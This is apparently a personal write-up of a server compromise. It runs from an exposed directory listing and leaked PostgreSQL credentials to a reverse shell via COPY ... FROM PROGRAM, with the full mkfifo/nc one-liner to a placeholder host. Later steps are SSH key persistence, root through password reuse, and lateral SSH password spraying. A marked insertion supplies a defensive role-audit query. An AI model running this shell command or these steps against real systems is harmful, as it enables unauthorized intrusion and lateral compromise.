Prologue

"The best exploits are the ones that never feel like exploits at all." (Mr. Robot)

I discovered that a web server was exposing its directory contents.

[Figure: Directory Listing]

Several configuration and compressed files were visible, indicating a likely leak of sensitive information.

Source Code Analysis

After downloading and analyzing the exposed files, I found a PHP configuration file containing PostgreSQL database credentials.

[Figure: Source Code Analysis]

Database Connection

Using the extracted credentials, I connected to the PostgreSQL server and successfully authenticated.

[Figure: Database Connection]

PostgreSQL to Reverse Shell

After confirming access, I attempted to escalate this to Remote Command Execution.

Role Enumeration

First, I enumerated the role of the database user.

[Figure: Database User Role Enumeration]

The user had superuser privileges, which was promising.

Permission Enumeration

To enumerate detailed permissions, I used the following query:

SELECT r.rolname,
       r.rolsuper,
       r.rolinherit,
       r.rolcreaterole,
       r.rolcreatedb,
       r.rolcanlogin,
       r.rolconnlimit,
       r.rolvaliduntil,
       ARRAY(SELECT b.rolname
             FROM pg_catalog.pg_auth_members m
             JOIN pg_catalog.pg_roles b ON (m.roleid = b.oid)
             WHERE m.member = r.oid) AS memberof,
       r.rolreplication
FROM pg_catalog.pg_roles r
ORDER BY 1;
[Figure: Database User Permission Enumeration]

The role held pg_execute_server_program, the predefined role that permits OS-level command execution through COPY ... FROM PROGRAM.
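Defensive counterpart to the enumeration query above, added here as an example and not part of the original writeup: it lists every login role that can reach COPY ... FROM PROGRAM, either as a superuser or through effective membership in pg_execute_server_program, so such rights can be stripped from application accounts. It assumes PostgreSQL 11 or later, where the predefined pg_execute_server_program, pg_read_server_files and pg_write_server_files roles exist; webapp_user in the remediation comments is a placeholder name.

```sql
-- Audit: which login roles can run OS commands via COPY ... FROM PROGRAM?
-- Assumes PostgreSQL 11+, where these predefined roles exist.
-- pg_has_role(..., 'USAGE') is true when the target role's privileges apply
-- to the member without SET ROLE, i.e. the membership is effective at once;
-- superusers are reported as members of every role.
SELECT r.rolname,
       r.rolsuper,
       pg_has_role(r.oid, 'pg_execute_server_program', 'USAGE') AS can_run_programs,
       pg_has_role(r.oid, 'pg_read_server_files',      'USAGE') AS can_read_files,
       pg_has_role(r.oid, 'pg_write_server_files',     'USAGE') AS can_write_files,
       r.rolvaliduntil
FROM pg_catalog.pg_roles r
WHERE r.rolcanlogin                          -- only roles that can actually connect
  AND (r.rolsuper
       OR pg_has_role(r.oid, 'pg_execute_server_program', 'USAGE'))
ORDER BY r.rolsuper DESC, r.rolname;

-- Remediation for an application account that should only touch its own data
-- (webapp_user is a placeholder; substitute the role found by the audit):
-- REVOKE pg_execute_server_program FROM webapp_user;
-- ALTER ROLE webapp_user NOSUPERUSER;
```

Any row returned is an account that should never be embedded in a web application's configuration file; after revoking, grant only the table-level privileges the application needs.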

Remote Code Execution

Using PostgreSQL's COPY ... FROM PROGRAM, I executed a reverse shell payload:

CREATE TABLE shell(output text);
COPY shell FROM PROGRAM 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc x.x.x.x 4444 >/tmp/f';
[Figure: Command Execution]

Listener setup:

nc -lnvp 4444
[Figure: Reverse Shell]

SSH Connection

Port 22 (SSH) was open on the target.

[Figure: Open SSH Port]

I located the home directory of the postgres user.

[Figure: Home Directory of User]

I added my public key to the user's authorized_keys file.

[Figure: Adding Authorized Keys]

I then logged in successfully via SSH.

[Figure: SSH Connection]

Privilege Escalation

While reviewing /etc/passwd, I noticed a system user whose name matched the credentials found in the PHP file. Trying the same password worked. This user also had sudo privileges, giving immediate root shell access.

[Figure: Same Password for System User]

Lateral Movement

The compromised server resided in a private Class B network. I scanned the subnet for SSH using Gill-Singh-A/Port-Scanner and performed SSH password spraying using Gill-Singh-A/SSH-Brute-Force. This resulted in successful access to two additional hosts.

[Figure: SSH Brute Force]

Attack Path

[Figure: Attack Path, plotted using Maltego]

References